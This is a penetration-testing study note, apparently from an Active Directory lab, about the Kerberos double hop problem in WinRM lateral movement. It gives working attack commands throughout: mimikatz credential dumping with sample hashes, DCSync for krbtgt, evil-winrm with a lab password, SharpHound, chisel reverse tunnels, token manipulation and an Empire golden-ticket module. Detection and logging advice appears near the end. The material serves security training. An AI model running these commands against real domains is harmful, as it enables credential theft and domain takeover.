The Kerberos "Double Hop" Problem is a critical authentication limitation that occurs when attempting to use Kerberos authentication across two or more network hops. This problem frequently arises during lateral movement operations, particularly when using WinRM/PowerShell remoting, and can significantly impact penetration testing and red team operations. Understanding and overcoming this limitation is essential for successful Active Directory exploitation and lateral movement.
Complete Active Directory Compromise Timeline:
Privileged Access → Double Hop Problem → Lateral Movement Solutions → Infrastructure Control
(WinRM Access) (Authentication) (Credential Workarounds) (Domain Domination)
Prerequisites from Previous Modules:
- Privileged access achieved: WinRM/PSRemote rights discovered via BloodHound
- Valid domain credentials: Obtained through various attack vectors
- Remote access established: Initial connection to target hosts
- Multi-hop requirements: Need to access additional resources from compromised hosts
- Tickets are NOT passwords: Signed pieces of data from KDC stating resource access rights
- Resource-specific: Each ticket grants access to a specific resource/service
- Non-transferable: Tickets cannot be reused for different services without proper delegation
- Time-limited: Tickets have expiration times and renewal periods
- Delegation-dependent: Require specific delegation configurations for multi-hop scenarios
- Hash storage: NTLM hash stored in session memory after authentication
- Reusable: Hash can be used for subsequent authentication attempts
- Session-persistent: Available for duration of user session
- Multi-hop capable: Can authenticate to multiple resources without additional configuration
- Initial Authentication: User authenticates to KDC, receives TGT (Ticket Granting Ticket)
- Service Request: User requests TGS (Ticket Granting Service) ticket for specific service
- Service Access: TGS ticket sent to target service for authentication
- Session Establishment: Service validates ticket and grants access
Attack Host → Target Host A → Target Host B
↓ ↓ ↓
Password TGS Ticket NO CREDENTIALS
Available Available (TGT not sent)
Critical Issue: When connecting via WinRM/PowerShell remoting:
- TGS ticket sent: Allows access to the immediate target (Host A)
- TGT ticket NOT sent: Cannot request new TGS tickets for additional resources (Host B)
- No credential caching: Password/hash not stored in remote session memory
- Authentication failure: Subsequent resource access denied
- Attack Host: Parrot/Kali Linux (domain-external)
- Target Host A: DEV01 (domain-joined, WinRM accessible)
- Target Host B: DC01 (Domain Controller, PowerView target)
- Credentials:
INLANEFREIGHT\backupadmwith Remote Management Users group membership
# Connect via WinRM from Windows host
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm
# Or via Evil-WinRM from Linux
evil-winrm -i 172.16.8.50 -u backupadm -p '!qazXSW@'# From within WinRM session on DEV01
cd 'C:\Users\Public\'
.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exitCritical Observation: Mimikatz output shows NO credentials for backupadm user:
Authentication Id : 0 ; 1284107 (00000000:0013980b)
Session : Interactive from 1
User Name : srvadmin
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 6/28/2022 3:46:05 PM
SID : S-1-5-21-1666128402-2659679066-1433032234-1107
msv :
[00000003] Primary
* Username : srvadmin
* Domain : INLANEFREIGHT
* NTLM : cf3a5525ee9414229e66279623ed5c58
* SHA1 : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
* DPAPI : 64fa83034ef8a3a9b52c1861ac390bce
tspkg :
wdigest :
* Username : srvadmin
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : srvadmin
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :Process Verification: WinRM processes running as backupadm:
tasklist /V |findstr backupadm
# Output:
# wsmprovhost.exe 1844 Services 0 85,212 K Unknown INLANEFREIGHT\backupadm 0:00:03 N/A# Check cached Kerberos tickets
klist
# Output shows only local service ticket:
Current LogonId is 0:0x57f8a
Cached Tickets: (1)
#0> Client: backupadm @ INLANEFREIGHT.LOCAL
Server: academy-aen-ms0$ @
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0xa10000 -> renewable pre_authent name_canonicalize
Start Time: 6/28/2022 7:31:53 (local)
End Time: 6/28/2022 7:46:53 (local)
Renew Time: 7/5/2022 7:31:18 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x4 -> S4U
Kdc Called: DC01.INLANEFREIGHT.LOCAL# Import PowerView module
import-module .\PowerView.ps1
# Attempt domain enumeration (FAILS)
get-domainuser -spn
# Error Output:
Exception calling "FindAll" with "0" argument(s): "An operations error occurred."
At C:\Users\backupadm\Documents\PowerView.ps1:5253 char:20
+ else { $Results = $UserSearcher.FindAll() }
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DirectoryServicesCOMException- Evil-WinRM sessions: Works perfectly with Linux attack hosts
- Non-interactive sessions: No GUI access required
- Command-by-command basis: Credentials passed with each PowerView command
- Flexibility: Can be used with any PowerShell cmdlet supporting
-Credentialparameter
1. Establish WinRM Session:
# From Linux attack host
evil-winrm -i 172.16.8.50 -u backupadm -p '!qazXSW@'2. Create PSCredential Object:
# Convert password to SecureString
$SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force
# Create PSCredential object
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)3. Execute Commands with Credentials:
# Import PowerView
import-module .\PowerView.ps1
# Successful domain enumeration with credential object
get-domainuser -spn -credential $Cred | select samaccountname
# Expected Output:
samaccountname
--------------
azureconnect
backupjob
krbtgt
mssqlsvc
sqltest
sqlqa
sqldev
mssqladm
svc_sql
sqlprod
sapsso
sapvc
vmwarescvc4. Verification of Failure Without Credentials:
# Attempt without credential object (FAILS)
get-domainuser -spn | select samaccountname
# Error Output:
Exception calling "FindAll" with "0" argument(s): "An operations error occurred."- ✅ Works with Evil-WinRM: Perfect for Linux-based attack hosts
- ✅ No GUI required: Fully command-line compatible
- ✅ Flexible application: Can be used with any credential-supporting cmdlet
- ✅ Immediate solution: No service restarts or configuration changes required
- ❌ Command-by-command: Must specify credentials with each command
- ❌ Tool compatibility: Some tools may not support
-Credentialparameter - ❌ Verbose syntax: Increases command complexity
- GUI access available: RDP or physical console access to Windows host
- Administrative privileges: Ability to register PSSession configurations
- Persistent sessions: Long-term enumeration without repeated credential passing
- Tool compatibility: Works with tools that don't support
-Credentialparameter
- Windows attack host or compromised domain-joined machine
- GUI access via RDP
- Administrative privileges on the host
- PowerShell console (not Evil-WinRM)
1. Initial WinRM Connection:
# From Windows PowerShell console
Enter-PSSession -ComputerName ACADEMY-AEN-DEV01.INLANEFREIGHT.LOCAL -Credential inlanefreight\backupadm2. Verify Double Hop Problem:
# Check cached tickets (shows only HTTP service ticket)
klist
# Output:
Current LogonId is 0:0x11e387
Cached Tickets: (1)
#0> Client: backupadm @ INLANEFREIGHT.LOCAL
Server: HTTP/ACADEMY-AEN-DEV01.INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize3. Register New PSSession Configuration:
# Exit current session first
Exit-PSSession
# Register new session configuration with RunAs credentials
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm
# WARNING: When RunAs is enabled in a Windows PowerShell session configuration,
# the Windows security model cannot enforce a security boundary between different
# user sessions that are created by using this endpoint.4. Restart WinRM Service:
# Restart WinRM service (will disconnect current sessions)
Restart-Service WinRM5. Connect Using Named Configuration:
# Establish new session with registered configuration
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess6. Verify Ticket Availability:
# Check cached tickets (now shows TGT!)
klist
# Output:
Current LogonId is 0:0x2239ba
Cached Tickets: (1)
#0> Client: backupadm @ INLANEFREIGHT.LOCAL
Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 6/28/2022 13:24:37 (local)
End Time: 6/28/2022 23:24:37 (local)
Renew Time: 7/5/2022 13:24:37 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC017. Successful Domain Enumeration:
# Import PowerView
Import-Module .\PowerView.ps1
# Execute commands without credential object
get-domainuser -spn | select samaccountname
# Successful Output:
samaccountname
--------------
azureconnect
backupjob
krbtgt
mssqlsvc
sqltest
sqlqa
sqldev
mssqladm
svc_sql
sqlprod
sapsso
sapvc
vmwarescvc- ✅ Persistent solution: No need to pass credentials with each command
- ✅ Tool compatibility: Works with all PowerShell tools and modules
- ✅ Native authentication: Proper Kerberos ticket caching
- ✅ Performance: Faster execution without repeated authentication
- ❌ GUI requirement: Cannot be used with Evil-WinRM
- ❌ Administrative privileges: Requires ability to register PSSession configurations
- ❌ Service restart: Requires WinRM service restart
- ❌ Platform limitation: Does not work from Linux PowerShell due to Kerberos limitations
Parrot Linux → DEV01 (WinRM) → DC01 (PowerView/BloodHound)
Solution: PSCredential Object method via Evil-WinRM
Windows Attack Box → Jump Server (RDP/PSSession) → File Servers/SQL Servers
Solution: PSSession Configuration or PSCredential Object method
User Workstation → DC01 (DCSync) → Trusted Domain Controllers
Solution: Depends on delegation configuration and trust relationship
# These commands require Domain Controller communication:
Get-DomainUser -SPN # Kerberoastable accounts
Get-DomainComputer # Domain computers
Get-DomainGroupMember "Domain Admins" # Privileged users
Find-LocalAdminAccess # Local admin rights
Get-DomainTrust # Trust relationships# SharpHound requires extensive AD queries:
.\SharpHound.exe -c All # Complete domain enumeration
.\SharpHound.exe -c Session,LoggedOn # Session and logon data# Mimikatz DCSync (requires DC communication):
.\mimikatz "lsadump::dcsync /user:krbtgt" exit
.\mimikatz "lsadump::dcsync /user:Administrator" exitIf unconstrained delegation is enabled on a server:
- TGT ticket forwarded: User's TGT sent along with TGS request
- Credential caching: Target server caches user's TGT
- Impersonation capability: Server can request TGS tickets on user's behalf
- Attack opportunity: Unconstrained delegation servers are high-value targets
# PowerView query for unconstrained delegation
Get-DomainComputer -Unconstrained | select name
# LDAP query for unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation- Limited scope: Delegation only to specific services
- Protocol transition: May allow protocol changes (Kerberos to NTLM)
- S4U2Self/S4U2Proxy: Service for User extensions enable constrained delegation
- Target-controlled: Delegation configured on target resource
- Modern approach: Newer delegation method in Windows 2012+
- Attack vector: Can be abused if target object permissions allow modification
# Enable CredSSP on client
Enable-WSManCredSSP -Role Client -DelegateComputer "target-server"
# Enable CredSSP on server
Enable-WSManCredSSP -Role Server
# Connect using CredSSP
Enter-PSSession -ComputerName "target" -Credential $cred -Authentication CredSSP- Credential exposure: Sends credentials to remote server
- Security risk: Credentials cached on target system
- Use with caution: Only in trusted environments
# Forward RDP through SSH tunnel
ssh -L 3389:target-dc:3389 user@jump-host
# Forward LDAP through SSH tunnel
ssh -L 389:target-dc:389 user@jump-host# SOCKS proxy for application-layer forwarding
./chisel server -p 8080 --reverse
./chisel client target-ip:8080 R:1080:socks# Inject into process running as target user
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "target-user"- Create process: Start new process as target user
- Inject payload: Insert shellcode or .NET assembly
- Inherit context: Process runs with target user's full credentials
# Monitor PSSession configuration changes
Get-PSSessionConfiguration
# Event ID monitoring:
# 4103 - PowerShell Script Block Logging
# 4104 - PowerShell Script Block Logging (detailed)
# 400-403 - Windows Remote Management events# Monitor CredSSP configuration changes
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation"
# Event ID monitoring:
# 4624 - Account logon (Network, Type 3)
# 4648 - Logon with explicit credentials# Enable detailed PowerShell logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockInvocationLogging" -Value 1# Enable PowerShell module logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" -Name "*" -Value "*"- AS-REQ/AS-REP: Initial authentication requests
- TGS-REQ/TGS-REP: Service ticket requests
- Unusual patterns: Multiple service ticket requests from single host
- Cross-subnet authentication: Unexpected Kerberos traffic patterns
- Port 5985/5986: Monitor WinRM HTTP/HTTPS traffic
- SOAP XML analysis: Examine WinRM command content
- Session duration: Identify long-running remote sessions
Attack Host → Domain A Server → Domain B Controller → Domain C Resources
Challenges:
- Cross-domain authentication: Different Kerberos realms
- Trust relationship dependencies: Transitive vs. non-transitive trusts
- Delegation configurations: Per-domain delegation settings
On-Premises → Azure AD Connect → Azure AD → Cloud Resources
Considerations:
- Authentication protocols: Kerberos vs. SAML vs. OAuth
- Credential synchronization: Password hash sync vs. pass-through authentication
- Hybrid identity: On-premises accounts with cloud access
# Function to handle double hop automatically
function Invoke-DoubleHopWorkaround {
param(
[string]$ComputerName,
[PSCredential]$Credential,
[string]$Command
)
# Create PSCredential object
$SecPassword = ConvertTo-SecureString $Credential.GetNetworkCredential().Password -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential($Credential.UserName, $SecPassword)
# Execute command with credential passing
Invoke-Command -ComputerName $ComputerName -Credential $Credential -ScriptBlock {
param($Cred, $Cmd)
Invoke-Expression "$Cmd -Credential `$Cred"
} -ArgumentList $Cred, $Command
}# Empire module for double hop handling
usemodule credentials/mimikatz/golden_ticket
set Credential domain\user:password
set Target target-server
execute- Kerberos vs. NTLM: Fundamental difference in credential handling
- Ticket mechanics: TGT vs. TGS ticket usage and limitations
- Authentication delegation: Constrained, unconstrained, and resource-based delegation
- Network protocols: WinRM, RDP, and their authentication mechanisms
- PSCredential Object: Universal solution for Evil-WinRM and command-line scenarios
- PSSession Configuration: Persistent solution for GUI-accessible Windows hosts
- Alternative methods: CredSSP, port forwarding, and process injection techniques
- Tool compatibility: Understanding which tools support which workarounds
- Attack platform: Linux vs. Windows attack host capabilities
- Target environment: Domain topology and delegation configurations
- Detection risk: Monitoring and logging considerations
- Persistence vs. stealth: Balancing effectiveness with operational security
- Red team operations: Realistic attack simulation with proper lateral movement
- Penetration testing: Comprehensive domain exploitation methodology
- Security assessment: Understanding authentication boundaries and limitations
- Incident response: Recognizing double hop exploitation techniques
🔑 Complete mastery of Kerberos "Double Hop" Problem - from technical understanding through practical workarounds to advanced attack chains - representing essential Active Directory lateral movement expertise for enterprise penetration testing!